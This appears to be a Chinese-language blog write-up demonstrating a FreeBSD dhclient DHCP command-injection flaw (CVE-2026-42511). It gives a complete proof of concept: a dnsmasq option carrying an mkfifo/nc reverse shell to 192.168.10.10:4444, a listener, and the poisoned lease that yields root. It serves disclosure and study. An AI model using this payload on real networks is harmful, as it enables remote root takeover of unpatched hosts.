FreeBSD CVE-2026-42511 「DHCP」 漏洞測試

Demo 影片：

原因：

• dhclient (DHCP client)：
  https://man.freebsd.org/cgi/man.cgi?query=dhclient
  客戶端 DHCP 管理工具
• /var/db/dhclient.leases.網卡名稱：( 例如 /var/db/dhclient.leases.em0 )
  https://man.freebsd.org/cgi/man.cgi?query=dhclient.leases
  dhclient 將 DHCP Server 取得的 IP 租約內容儲存在此檔案，但對特殊字元沒妥善處理，導致攻擊者可技巧性寫入惡意內容。
  
• /sbin/dhclient-script：
  https://man.freebsd.org/cgi/man.cgi?dhclient-script
  DHCP 用戶端網路設定的 Script，由 dhclient 不時呼叫 。
  查看 dhclient-script 內容，會發現裡面有一行 eval "$IFCONFIG $interface $medium"

漏洞概念測試：

在同區網，假設攻擊者已搶贏合法 DHCP 伺服器，讓受害者收到藏有惡意指令的租約內容。

• 攻擊者電腦
  使用 Dnsmasq 當作 DHCP 伺服器，並在裡面寫入惡意指令
  

  $ vi /etc/dnsmasq.d/poc.conf

  混入惡意的反向 Shell (Reverse Shell) 指令

  dhcp-option= 67 , "\";\n medium \";/usr/bin/mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | /usr/bin/nc 192.168.10.10 4444 > /tmp/f"

  重啟 Dnsmasq 
  

  $ systemctl restart dnsmasq

  監聽 4444 PORT，等待受害者上鉤
  

  $ nc -lvp 4444

• 受害者電腦
  這裡用手動操作，取代 DHCP 自動更新租約。
  查看 FreeBSD 版本

  $ freebsd-version -kru
  15.0-RELEASE
  15.0-RELEASE
  15.0-RELEASE

  
  查看沒惡意指令的正常租約內容
  

  $ cat /var/db/dhclient.leases.em1
  lease {
    interface "em1";
    fixed-address 192.168.10.142;
    next-server 192.168.10.10;
    option subnet-mask 255.255.255.0;
    option routers 192.168.10.1;
    option domain-name-servers 8.8.8.8;
    option host-name "test";
    option broadcast-address 192.168.10.255;
    option dhcp-lease-time 43200;
    option dhcp-message-type 5;
    option dhcp-server-identifier 192.168.10.10;
    option dhcp-renewal-time 21600;
    option dhcp-rebinding-time 37800;
    renew 1 2026/5/11 13:33:13;
    rebind 1 2026/5/11 18:03:13;
    expire 1 2026/5/11 19:33:13;
  }
  
  

  
  取得有惡意指令的租約內容

  $ rm /var/db/dhclient.leases.em1
  $ service dhclient restart em1
  $ cat /var/db/dhclient.leases.em1
  lease {
    interface "em1";
    fixed-address 192.168.10.142;
    next-server 192.168.10.10;
    filename "";
   medium ";/usr/bin/mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | /usr/bin/nc 192.168.10.10 4444 > /tmp/f";
    option subnet-mask 255.255.255.0;
    option routers 192.168.10.1;
    option domain-name-servers 8.8.8.8;
    option host-name "test";
    option broadcast-address 192.168.10.255;
    option dhcp-lease-time 43200;
    option dhcp-message-type 5;
    option dhcp-server-identifier 192.168.10.10;
    option dhcp-renewal-time 21600;
    option dhcp-rebinding-time 37800;
    renew 1 2026/5/11 13:36:05;
    rebind 1 2026/5/11 18:06:05;
    expire 1 2026/5/11 19:36:05;
  }

  
  執行惡意租約內容

  $ killall dhclient
  $ service dhclient start em1

• 攻擊者監聽的 4444 PORT，取得 root 權限連線
  
  
  
  
  
  
  

參考：

• https://www.cve.org/CVERecord?id=CVE-2026-42511
  CVE Record: CVE-2026-42511
• https://www.freebsd.org/security/advisories/FreeBSD-SA-26:12.dhclient.asc
  Remote code execution via malicious DHCP options 
• https://blog.csdn.net/weixin_42376192/article/details/160808327
  全网首发 | CVE-2026-42511 FreeBSD dhclient高危RCE漏洞：本地网络静默Root全解析_cve-2026-42511 demo-CSDN博客
• https://aisle.com/blog/aisle-discovers-cve-2026-42511-a-21-year-old-freebsd-remote-command-execution-vulnerability
  AISLE Finds 21-Year-Old FreeBSD RCE Hidden in dhclient | AISLE